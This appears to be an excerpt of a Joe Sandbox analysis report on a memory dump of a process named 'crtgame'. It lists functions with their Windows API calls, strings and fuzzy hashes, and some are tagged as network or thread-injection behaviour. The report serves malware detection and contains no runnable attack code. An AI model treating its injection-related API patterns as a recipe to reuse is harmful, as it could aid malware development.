Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$OpenResetValue
String ID:
API String ID: 1556185888-0
Opcode ID: dd786987ef4c5e36b8dff7bf0e0ee53d59bffff6c8906ddd7a85fff6629698ee
Instruction ID: 339693607606682bb02824e9d5717cc4b61bdab7f701654e747887d8c4c8d5d3
Opcode Fuzzy Hash: dd786987ef4c5e36b8dff7bf0e0ee53d59bffff6c8906ddd7a85fff6629698ee
Instruction Fuzzy Hash: FB01DF72A44244ABD300CF59D849B5BBBACEB05670F140B6AE829D3680DB71A9008AA4

Non-executed Functions

Function 02C402E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179windowCOMMON

Download Yara Rule

APIs

Part of subcall function 02C39478: __EH_prolog.LIBCMT ref: 02C3947D
Part of subcall function 02C39478: _Allocate.LIBCPMT ref: 02C394D4

_memset.LIBCMT ref: 02C40359
FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02C403C2
GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02C403CA

Strings

invalid string position, xrefs: 02C40516
Unknown error, xrefs: 02C40419

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: AllocateErrorFormatH_prologLastMessage_memset
String ID: Unknown error$invalid string position
API String ID: 2731337147-1837348584
Opcode ID: 8781a518f5822aafc0814f8247cfa32e19648f720283f585a0a93193565a85d1
Instruction ID: d9c84d6bb08e6db714403ee766792792454d80aef6bf6eab515fc88421b2d22b
Opcode Fuzzy Hash: 8781a518f5822aafc0814f8247cfa32e19648f720283f585a0a93193565a85d1
Instruction Fuzzy Hash: A451CA70648341CFE718CF25C890B2FBBE4AB88748F90092DF58197691DB71E688CF96

Function 02C48F48 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,02C448B6,?,?,?,00000001), ref: 02C48F4D
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02C48F56

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e65d37cca5e851227e08bc63f5e74a67c06dbbf84987c3fc88a06d9c59144c90
Instruction ID: f50452125ea7a1b636f52127c873d27e0840312d27d987c91ff8088f293aa861
Opcode Fuzzy Hash: e65d37cca5e851227e08bc63f5e74a67c06dbbf84987c3fc88a06d9c59144c90
Instruction Fuzzy Hash: 4BB09231484318EBCA412B91EC0DB89BFA8EF84662F404950F60E54061CB7294E49AE2

Function 02C324E1 Relevance: 21.2, APIs: 14, Instructions: 173COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C324E6
InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02C324FC
RtlEnterCriticalSection.NTDLL(?), ref: 02C3250E
RtlLeaveCriticalSection.NTDLL(?), ref: 02C3256D
SetLastError.KERNEL32(00000000,?,7622DFB0), ref: 02C3257F
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7622DFB0), ref: 02C32599
GetLastError.KERNEL32(?,7622DFB0), ref: 02C325A2
InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C325F0
InterlockedDecrement.KERNEL32(00000002), ref: 02C3262F
InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C3268E
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C32699
InterlockedExchange.KERNEL32(00000000,00000001), ref: 02C326AD
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7622DFB0), ref: 02C326BD
GetLastError.KERNEL32(?,7622DFB0), ref: 02C326C7

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
String ID:
API String ID: 1213838671-0
Opcode ID: 6f9d99febf39e86f6c8fe23b4a0e3e2d8f65545bbb8628db95c02c1946cfec6a
Instruction ID: 6c5070072f3edba1822a4a31c63b937235c3d46dda52e7bdc5e8420afcf4c0ef
Opcode Fuzzy Hash: 6f9d99febf39e86f6c8fe23b4a0e3e2d8f65545bbb8628db95c02c1946cfec6a
Instruction Fuzzy Hash: 74611C71900319AFCB11DFA4D984AAEBBF9FF48310F10492AE956E3240D734DA94CFA1

Function 02C3452E Relevance: 19.9, APIs: 13, Instructions: 442networkCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C34533

Part of subcall function 02C4356D: _malloc.LIBCMT ref: 02C43585

htons.WS2_32(?), ref: 02C34594
htonl.WS2_32(?), ref: 02C345B7
htonl.WS2_32(00000000), ref: 02C345BE
htons.WS2_32(00000000), ref: 02C34672
_sprintf.LIBCMT ref: 02C34688
htons.WS2_32(?), ref: 02C345DB

Part of subcall function 02C390D6: __EH_prolog.LIBCMT ref: 02C390DB
Part of subcall function 02C390D6: RtlEnterCriticalSection.NTDLL(00000020), ref: 02C39156
Part of subcall function 02C390D6: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C39174

Part of subcall function 02C31BA7: __EH_prolog.LIBCMT ref: 02C31BAC
Part of subcall function 02C31BA7: RtlEnterCriticalSection.NTDLL ref: 02C31BBC
Part of subcall function 02C31BA7: RtlLeaveCriticalSection.NTDLL ref: 02C31BEA
Part of subcall function 02C31BA7: RtlEnterCriticalSection.NTDLL ref: 02C31C13
Part of subcall function 02C31BA7: RtlLeaveCriticalSection.NTDLL ref: 02C31C56

Part of subcall function 02C3D892: __EH_prolog.LIBCMT ref: 02C3D897

htonl.WS2_32(?), ref: 02C348A7
htonl.WS2_32(00000000), ref: 02C348AE
htonl.WS2_32(00000000), ref: 02C348F3
htonl.WS2_32(00000000), ref: 02C348FA
htons.WS2_32(?), ref: 02C3491A
htons.WS2_32(?), ref: 02C34924

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_sprintf
String ID:
API String ID: 725951905-0
Opcode ID: 59af6f3f6318d0fc0995c3644e68b98bf2046a58fb9dc60e7e7a526e8486f9fd
Instruction ID: 36cf23c3ea8dd4815196458c417a75336523bb7284544f6c94cbbb174697847a
Opcode Fuzzy Hash: 59af6f3f6318d0fc0995c3644e68b98bf2046a58fb9dc60e7e7a526e8486f9fd
Instruction Fuzzy Hash: E0026A71C00259EEDF26DFA4D844BEEBBB9BF09304F10495AE505B7280DB745A88DFA1

Function 02C33423 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C33428
GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02C3346B
GetProcAddress.KERNEL32(00000000), ref: 02C33472
GetLastError.KERNEL32 ref: 02C33486
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C334D7
RtlEnterCriticalSection.NTDLL(00000018), ref: 02C334ED
RtlLeaveCriticalSection.NTDLL(00000018), ref: 02C33518

Strings

CancelIoEx, xrefs: 02C33461
KERNEL32, xrefs: 02C33466

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
String ID: CancelIoEx$KERNEL32
API String ID: 2902213904-434325024
Opcode ID: c317c46be5c87e150637cdc86c0f00b6abef5906e3a8ef5a616253318e9c6e39
Instruction ID: c2c4077e88aa65c23e3178c372813ef509b2728925e439a11459dc172ffc40e6
Opcode Fuzzy Hash: c317c46be5c87e150637cdc86c0f00b6abef5906e3a8ef5a616253318e9c6e39
Instruction Fuzzy Hash: D3318FB2900355DFDB129F64D84476ABBF9FF88321F0089A9E905AB240DB70D941CFE1

Function 02C41030 Relevance: 10.6, APIs: 7, Instructions: 132COMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C410D0
CloseHandle.KERNEL32(00000000), ref: 02C410E5
ResetEvent.KERNEL32(00000000), ref: 02C410EF
CloseHandle.KERNEL32(00000000,6BE866C2), ref: 02C41124
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,6BE866C2), ref: 02C4119A
CloseHandle.KERNEL32(00000000), ref: 02C411AF

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateOpenReset
String ID:
API String ID: 1285874450-0
Opcode ID: 74b95e1816759563c4e20af35478e235a01fe1fd2c76ef5e4da82b984221a83a
Instruction ID: 96103553885f5acb1f1b5bcc43edd8a31b80acac5e6b70e252b6b6982a44a086
Opcode Fuzzy Hash: 74b95e1816759563c4e20af35478e235a01fe1fd2c76ef5e4da82b984221a83a
Instruction Fuzzy Hash: 24413171D043589BDF20CFA5CC44BAEBBB8EF45724F144619E85CEB280DBB49A85CB91

Function 02C32081 Relevance: 10.6, APIs: 7, Instructions: 116timeCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000001), ref: 02C320AC
SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C320CD
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C320D8
InterlockedDecrement.KERNEL32(?), ref: 02C3213E
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02C3217A
InterlockedDecrement.KERNEL32(?), ref: 02C32187
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C321A6

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
String ID:
API String ID: 1171374749-0
Opcode ID: 4a92522cd0313c079b7aa987ea77076a6b2b94eae8ea01286645e3665b39903b
Instruction ID: e70251ea2286a1e3ab1e3477ab14aa448f21b6853f788dc70c25322b23965d54
Opcode Fuzzy Hash: 4a92522cd0313c079b7aa987ea77076a6b2b94eae8ea01286645e3665b39903b
Instruction Fuzzy Hash: 134116715047019FC722DF25D884A6BBBF9FFC8664F044A1EA89692650D730EA49CFA2

Function 02C41142 Relevance: 10.6, APIs: 7, Instructions: 107synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02C418F0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02C4114E,?,?), ref: 02C4191F
Part of subcall function 02C418F0: CloseHandle.KERNEL32(00000000,?,?,02C4114E,?,?), ref: 02C41934
Part of subcall function 02C418F0: SetEvent.KERNEL32(00000000,02C4114E,?,?), ref: 02C41947

OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C410D0
CloseHandle.KERNEL32(00000000), ref: 02C410E5
ResetEvent.KERNEL32(00000000), ref: 02C410EF
CloseHandle.KERNEL32(00000000,6BE866C2), ref: 02C41124
__CxxThrowException@8.LIBCMT ref: 02C41155

Part of subcall function 02C43F7A: RaiseException.KERNEL32(?,?,?,02C60F6C,?,00000400,?,?,?,02C435BD,?,02C60F6C,00000000,00000001), ref: 02C43FCF

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,6BE866C2), ref: 02C4119A
CloseHandle.KERNEL32(00000000), ref: 02C411AF

Part of subcall function 02C41630: GetCurrentProcessId.KERNEL32(?), ref: 02C41689

WaitForSingleObject.KERNEL32(00000000,000000FF,6BE866C2), ref: 02C411BF

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
String ID:
API String ID: 2227236058-0
Opcode ID: b154a3eca51b426c3cb075ca584631f8ef362e8a2aa3efb0b2d7bb122e097cf4
Instruction ID: eaae9602e8540b378b1818ed60259a402d238650ae864277703b6e991bb6d287
Opcode Fuzzy Hash: b154a3eca51b426c3cb075ca584631f8ef362e8a2aa3efb0b2d7bb122e097cf4
Instruction Fuzzy Hash: 0A315271E003599BDF20CBE4DC44BAEB7B9AF45724F184219E85CE7280DBA09A85CB91

Function 02C457B4 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 02C457B4

Part of subcall function 02C47F22: RtlEncodePointer.NTDLL(00000000), ref: 02C47F25
Part of subcall function 02C47F22: __initp_misc_winsig.LIBCMT ref: 02C47F40
Part of subcall function 02C47F22: GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 02C48CA1
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C48CB5
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C48CC8
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C48CDB
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C48CEE
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02C48D01
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02C48D14
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02C48D27
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02C48D3A
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02C48D4D
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02C48D60
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02C48D73
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02C48D86
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02C48D99
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02C48DAC
Part of subcall function 02C47F22: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02C48DBF

__mtinitlocks.LIBCMT ref: 02C457B9
__mtterm.LIBCMT ref: 02C457C2

Part of subcall function 02C4582A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02C48358
Part of subcall function 02C4582A: RtlDeleteCriticalSection.NTDLL(02C63978), ref: 02C48381

__calloc_crt.LIBCMT ref: 02C457E7
__initptd.LIBCMT ref: 02C45809
GetCurrentThreadId.KERNEL32 ref: 02C45810

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
String ID:
API String ID: 1500305132-0
Opcode ID: 59be75322d20adb78b6f264eb01e3e0a24a0077c936fdc2562e3d675a14ee526
Instruction ID: e1e97332862044bce66a04381af75f094a2aa435b59f6e14cf49646430dc893d
Opcode Fuzzy Hash: 59be75322d20adb78b6f264eb01e3e0a24a0077c936fdc2562e3d675a14ee526
Instruction Fuzzy Hash: 21F02E32AA97115BF6343BB87C01B5B3B86EF11FF4BA00B2AF060C60C0FF1194412990

Function 02C42EE1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02C42E93,00000000), ref: 02C42EFB
GetProcAddress.KERNEL32(00000000), ref: 02C42F02
RtlEncodePointer.NTDLL(00000000), ref: 02C42F0E
RtlDecodePointer.NTDLL(00000001), ref: 02C42F2B

Strings

RoInitialize, xrefs: 02C42EEA
combase.dll, xrefs: 02C42EF6

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: bdf8873c808d0a75f93dbbf27bbdab3857c7043d2e7fa428faded45ac540875d
Instruction ID: ed020fef671ceb98dbe5f5a0fd3f25c4b11f07815bc89e2bb1f7ec0f2bdf4ba6
Opcode Fuzzy Hash: bdf8873c808d0a75f93dbbf27bbdab3857c7043d2e7fa428faded45ac540875d
Instruction Fuzzy Hash: 50E0E570ED0360AAFB101F71ED0EB067769A744B02FA04B34F806E1080DBBA81E88B58

Function 02C42FB7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02C42ED0), ref: 02C42FD1
GetProcAddress.KERNEL32(00000000), ref: 02C42FD8
RtlEncodePointer.NTDLL(00000000), ref: 02C42FE3
RtlDecodePointer.NTDLL(02C42ED0), ref: 02C42FFE

Strings

RoUninitialize, xrefs: 02C42FC0
combase.dll, xrefs: 02C42FCC

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 900ff7fd69ebf9103d9540aaf70b24b5a720f68b68c0ca1c7a0596121f2fbcb7
Instruction ID: 89912d8b00f0bfaeb64d0b55f7b6ed3a8cfdad0aefcf25df2c2b35b790741151
Opcode Fuzzy Hash: 900ff7fd69ebf9103d9540aaf70b24b5a720f68b68c0ca1c7a0596121f2fbcb7
Instruction Fuzzy Hash: BBE09270EC4324AAFB205F61AD0DB167A69A744702FA04B24F506E1094DFB8D0E8DA98

Function 02C41950 Relevance: 10.2, APIs: 8, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000025,6BE866C2,?,?,?,?,00000000,02C564E8,000000FF,02C41BEA), ref: 02C4198A
TlsSetValue.KERNEL32(00000025,02C41BEA,?,?,00000000), ref: 02C419F7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C41A21
HeapFree.KERNEL32(00000000), ref: 02C41A24

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: HeapValue$FreeProcess
String ID:
API String ID: 1812714009-0
Opcode ID: 7aaab45437239508dfb8f46eb8ed6e14dfb388f9a5d4e53cda42dd9e29793f42
Instruction ID: a5bce96b6f635601f5cb43601b5874f7eb7f087c500a6a86478365349a6d4ba0
Opcode Fuzzy Hash: 7aaab45437239508dfb8f46eb8ed6e14dfb388f9a5d4e53cda42dd9e29793f42
Instruction Fuzzy Hash: D851B1319843549FD720CF29C448B17BBE5EF85664F0D865AE89D97380DBB0ED84CBA1

Function 02C550B0 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 02C551C0
__FindPESection.LIBCMT ref: 02C551DA

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: 4017e4548122d2c7a754f999a519d5edc17420a29c0129b596f784f60c7db9dd
Instruction ID: 0959ddc9bf7b39606dfd07b94eac6c0a0abafe4bf2f7b51431ee1e6cc3f0b066
Opcode Fuzzy Hash: 4017e4548122d2c7a754f999a519d5edc17420a29c0129b596f784f60c7db9dd
Instruction Fuzzy Hash: 23A1D071E002258FCB20CF59D984BAEB7A5FF843A8F544669DC09EB351E731E981CB94

Function 02C31C91 Relevance: 9.0, APIs: 6, Instructions: 39synchronizationthreadinjectionCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C31CB1
CloseHandle.KERNEL32(?), ref: 02C31CBA
InterlockedExchangeAdd.KERNEL32(02C67468,00000000), ref: 02C31CC6
TerminateThread.KERNEL32(?,00000000), ref: 02C31CD4
QueueUserAPC.KERNEL32(02C31E7C,?,00000000), ref: 02C31CE1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C31CEC

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
String ID:
API String ID: 1946104331-0
Opcode ID: acae7d172b244163578a7e1aae5d4d35324ef10d2286ec56d42d31187b995629
Instruction ID: aaf2c0cf697ac4e1ac51d11f5e6cc1caf3081fdc56b1cf03c013d95829798581
Opcode Fuzzy Hash: acae7d172b244163578a7e1aae5d4d35324ef10d2286ec56d42d31187b995629
Instruction Fuzzy Hash: 10F06D31940220AF9B104B9AED0DD5BBFFCEF857217004B59F52A92190DBA099948BA0

Function 02C3C64E Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C3C653

Part of subcall function 02C3CC2F: std::exception::exception.LIBCMT ref: 02C3CC5E

Part of subcall function 02C3D3E5: __EH_prolog.LIBCMT ref: 02C3D3EA

Part of subcall function 02C4356D: _malloc.LIBCMT ref: 02C43585

Part of subcall function 02C3CC8E: __EH_prolog.LIBCMT ref: 02C3CC93

Strings

C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C3C690
hlm, xrefs: 02C3C67F, 02C3C70F
X/m, xrefs: 02C3C6E2, 02C3C70A
class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02C3C689

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$_mallocstd::exception::exception
String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$X/m$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)$hlm
API String ID: 1953324306-2091097792
Opcode ID: ca4fd01d0ab6b64ea95afa2ef15ac43764c0fee95cb2c45f1e3c682047149065
Instruction ID: 5421693975e47de27c57368306cab8c21319be1f9196b1a90c8cdbe8046eeb0f
Opcode Fuzzy Hash: ca4fd01d0ab6b64ea95afa2ef15ac43764c0fee95cb2c45f1e3c682047149065
Instruction Fuzzy Hash: 0F21B1B1E002589ADB05EFE8D948BEEBBB5EF44704F00495EE806A7280CB709A44DF91

Function 02C41350 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 02C4139F

Part of subcall function 02C41EF3: std::exception::_Copy_str.LIBCMT ref: 02C41F0C

Part of subcall function 02C40770: __CxxThrowException@8.LIBCMT ref: 02C407CE

std::exception::exception.LIBCMT ref: 02C413FE

Strings

$, xrefs: 02C41403
boost unique_lock has no mutex, xrefs: 02C4138E
boost unique_lock owns already the mutex, xrefs: 02C413ED

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
API String ID: 2140441600-46888669
Opcode ID: 4dbe5be118dfd195a3e1b0952b0394329dc3151d07ed390c1399afed39a7eafb
Instruction ID: 62d52160fb6c676ccd148546becf459bdf02289a9aeef36b463ed603ad219c9c
Opcode Fuzzy Hash: 4dbe5be118dfd195a3e1b0952b0394329dc3151d07ed390c1399afed39a7eafb
Instruction Fuzzy Hash: 002124B15083809FD310DF24C54875BBBE9BB88B08F404E5DF8A587680DBB5D848CF86

Function 02C4449C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 02C444A0

Part of subcall function 02C45692: GetLastError.KERNEL32(?,02C4358A,02C45880,02C42A53,00000400,?,02C4358A,02C3F38F,?,?,02C3F38F,00000000), ref: 02C45694
Part of subcall function 02C45692: __calloc_crt.LIBCMT ref: 02C456B5
Part of subcall function 02C45692: __initptd.LIBCMT ref: 02C456D7
Part of subcall function 02C45692: GetCurrentThreadId.KERNEL32 ref: 02C456DE
Part of subcall function 02C45692: SetLastError.KERNEL32(00000000,02C4358A,02C3F38F,?,?,02C3F38F,00000000), ref: 02C456F6

__calloc_crt.LIBCMT ref: 02C444C3
__get_sys_err_msg.LIBCMT ref: 02C444E1
__invoke_watson.LIBCMT ref: 02C444FE

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02C444AB, 02C444D1

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 109275364-798102604
Opcode ID: d443dd9459d587718c270d026ccfc41457a23f560ed1a00ada77cd374c457f9a
Instruction ID: ce0ff07c3e49a218e7cebb32afc579a4a1e02468a83c77a31fed444ec79540d1
Opcode Fuzzy Hash: d443dd9459d587718c270d026ccfc41457a23f560ed1a00ada77cd374c457f9a
Instruction Fuzzy Hash: 63F059B29007142BAA3A652A8C00B7B728EEB807F0BA05526FD44D7600EF21DD405698

Function 02C32341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000001), ref: 02C32350
InterlockedExchange.KERNEL32(?,00000001), ref: 02C32360
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C32370
GetLastError.KERNEL32 ref: 02C3237A

Part of subcall function 02C31712: __EH_prolog.LIBCMT ref: 02C31717

Strings

pqcs, xrefs: 02C32388

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
String ID: pqcs
API String ID: 1619523792-2559862021
Opcode ID: 0adaeaa7d3e94b59f3a182b23567b3a46fb4c5e0dd0bc10d128faa8320261d4a
Instruction ID: 7cd324fbbb75c2719ebe281d695d48e805f96bf5384faacd63e596e7ed9198ad
